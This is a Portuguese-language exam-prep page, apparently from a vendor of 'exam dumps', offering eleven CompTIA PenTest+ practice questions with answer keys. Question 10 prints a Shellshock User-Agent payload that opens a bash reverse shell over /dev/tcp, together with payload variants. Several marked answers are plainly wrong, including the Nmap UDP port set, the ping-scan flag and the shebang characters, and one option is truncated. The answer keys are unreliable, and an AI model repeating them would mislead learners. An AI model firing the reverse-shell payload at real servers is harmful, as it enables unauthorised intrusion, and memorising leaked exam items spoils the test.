NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

2024 Atualizado CompTIA PT0-002 Exam Questions & Practice Tests, Certificação CompTIA PenTest+ | SPOTO

Prepare-se para obter a sua certificação CompTIA PenTest+ (PT0-002) com os nossos recursos de estudo abrangentes. A melhor maneira de garantir o sucesso no exame é praticando com as perguntas mais recentes do exame. Nossos materiais de estudo cobrem uma ampla gama de tópicos e cenários, incluindo testes práticos de penetração e tarefas de gerenciamento de vulnerabilidades. Com acesso a testes práticos, exemplos de perguntas, lixeiras de exame e perguntas e respostas de exame, você desenvolverá o conhecimento e as habilidades necessárias para se destacar. Os nossos exames simulados e o simulador de exames proporcionam uma experiência de exame realista para melhorar ainda mais a sua preparação. Utilize nossos materiais de exame e respostas de exame para reforçar sua compreensão e prontidão para o exame PT0-002. Com nossos recursos de estudo, você estará bem preparado para demonstrar sua experiência em segurança cibernética e obter sucesso na obtenção de sua certificação CompTIA PenTest+.
Faça outros exames online
Pergunta #1
Uma empresa de consultoria está a preencher o ROE durante a delimitação do âmbito. Qual das seguintes opções deve ser incluída na ROE?
A. Custo da avaliação
B. Distribuição do relatório
C. Restrições de ensaio
D. Responsabilidade
Ver resposta
Resposta correta: C
Pergunta #2
Qual das seguintes opções fornece uma matriz de tácticas e técnicas comuns utilizadas pelos atacantes, juntamente com as atenuações recomendadas?
A. NIST SP 800-53
B. OWASP Top 10
C. Quadro MITRE ATT&CK
D. Orientações técnicas PTES
Ver resposta
Resposta correta: C
Pergunta #3
Um testador de penetração gostaria de obter credenciais de FTP implantando uma estação de trabalho como um ataque on-path entre o alvo e o servidor que tem o protocolo FTP. Qual dos métodos a seguir seria o MELHOR para atingir esse objetivo?
A. Aguardar o próximo login e executar um ataque de downgrade no servidor
B. Capturar o tráfego usando o Wireshark
C. Efetuar um ataque de força bruta ao servidor
D. Usar um exploit de FTP contra o servidor
Ver resposta
Resposta correta: B
Pergunta #4
Qual das seguintes ferramentas fornece classes Python para interagir com protocolos de rede?
A. Respondente
B. Impacket
C. Império
D. PowerSploit
Ver resposta
Resposta correta: B
Pergunta #5
Um cliente solicitou que a verificação do teste de penetração incluísse os seguintes serviços UDP: SNMP, NetBIOS e DNS. Qual dos seguintes comandos do Nmap executará a varredura?
A. nmap -vv sUV -p 53, 123-159 10
B. nmap -vv sUV -p 53,123,161-162 10
C. nmap -vv sUV -p 53,137-139,161-162 10
D. nmap -vv sUV -p 53, 122-123, 160-161 10
Ver resposta
Resposta correta: B
Pergunta #6
Um técnico de testes de penetração está a preparar-se para realizar actividades para um cliente que requerem uma perturbação mínima das operações da empresa. Quais das seguintes opções são consideradas ferramentas de reconhecimento passivo? (Escolha duas.)
A. Wireshark
B. Nessus
C. Retina
D. Conjunto de arrotos
E. Shodan
F. Nikto
Ver resposta
Resposta correta: A
Pergunta #7
Um testador de penetração está a tentar descobrir rapidamente anfitriões activos numa sub-rede. Qual dos seguintes comandos executará uma verificação de ping?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
Ver resposta
Resposta correta: C
Pergunta #8
Um testador de penetração executou uma varredura do Nmap em um dispositivo de rede voltado para a Internet com a opção -F e encontrou algumas portas abertas. Para enumerar ainda mais, o testador executou outra varredura usando o seguinte comando: nmap -O -A -sS -p- 100.100.100.50 O Nmap retornou que todas as 65.535 portas foram filtradas. Qual das seguintes situações é a mais provável de ter ocorrido no segundo scan?
A. Uma firewall ou IPS bloqueou a verificação
B. O testador de penetração usou sinalizadores não suportados
C. O dispositivo de rede periférica foi desligado
D. O scan devolveu respostas de eco ICMP
Ver resposta
Resposta correta: D
Pergunta #9
Uma empresa que exige o mínimo de perturbação das suas actividades diárias precisa de um técnico de testes de penetração para efetuar a recolha de informações sobre a presença da empresa na Web. Qual das seguintes opções seria a mais útil para o examinador nas etapas iniciais de recolha de informações? (Escolha duas.)
A. Endereços IP e subdomínios
B. Transferências de zona
C. Pesquisas de DNS directas e inversas
D. Motores de pesquisa na Internet
E. Portas abertas viradas para o exterior
F. Resultados do Shodan
Ver resposta
Resposta correta: A
Pergunta #10
Um testador de penetração descobre um servidor Web vulnerável em 10.10.1.1. O testador edita então um script Python que envia um exploit da Web e depara-se com o seguinte código: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Qual das seguintes edições o testador deve fazer no script para determinar o contexto do utilizador no qual o servidor está a ser executado?
A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10
Ver resposta
Resposta correta: D
Pergunta #11
Ao desenvolver um script de shell destinado à interpretação no Bash, o interpretador /bin/bash deve ser explicitamente especificado. Qual das seguintes combinações de caracteres deve ser utilizada na primeira linha do script para atingir este objetivo?
A. #
B. $
C. ##
D. #$
E. #!
Ver resposta
Resposta correta: B

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.